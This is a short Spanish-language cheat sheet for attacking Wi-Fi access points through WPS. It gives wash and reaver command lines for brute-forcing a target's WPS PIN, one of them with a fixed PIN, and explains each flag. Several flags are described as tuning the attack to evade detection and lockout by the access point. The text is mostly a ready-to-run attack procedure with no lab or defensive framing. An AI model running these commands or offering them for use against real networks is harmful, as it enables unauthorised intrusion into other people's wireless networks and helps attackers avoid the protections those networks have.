Ataque para obtención de PIN con Reaver
Ataque usado para la obtención de pin WPS.
Identificar redes con WPS activo a través de wash
wash -i <wifi_interface>
Ejecutar reaver sobre un bssid objetivo que posea activo el protocolo WPS
reaver -i <wifi_interface> -b <BSSID_AP> -c <channel_AP> -vv
Otra forma mas detalla de ejecución de reaver es
reaver -i <wifi_interface> -b <BSSID_AP> -c <channel_AP> -p 42483779 -vv --no-nacks -t 5 -d 10 -r 3:15
El detalle de los parámetros es el siguiente:
-i: interfaz inalámbrica en modo monitor
-b: dirección MAC del AP objetivo
-c: canal de transmisión del AP objetivo
-vv: hace que Reaver muestre mensajes más detallados durante la ejecución para la depuración y seguimiento del progreso del ataque
--no-nacks: los NACKs son mensajes que indican un error en la comunicación WPS. Al no enviarlos, puedes evitar que el punto de acceso bloquee o reduzca la velocidad de respuesta, lo que podría hacer que el ataque sea más efectivo
-t: configura un tiempo de espera de 5 segundos para recibir respuestas del punto de acceso. Este tiempo puede ser ajustado si se está experimentando lentitud en las respuestas
-d: configura un retraso de 10 segundos entre cada intento de adivinación del PIN WPS. Este parámetro puede ser útil para evitar la detección y bloqueo por parte del punto de acceso
-r: configura Reaver para que realice un máximo de 3 intentos de PIN por cada 15 segundos. Este parámetro ayuda a moderar la agresividad del ataque, lo cual puede ser necesario si el punto de acceso implementa mecanismos de bloqueo basados en la frecuencia de los intentos.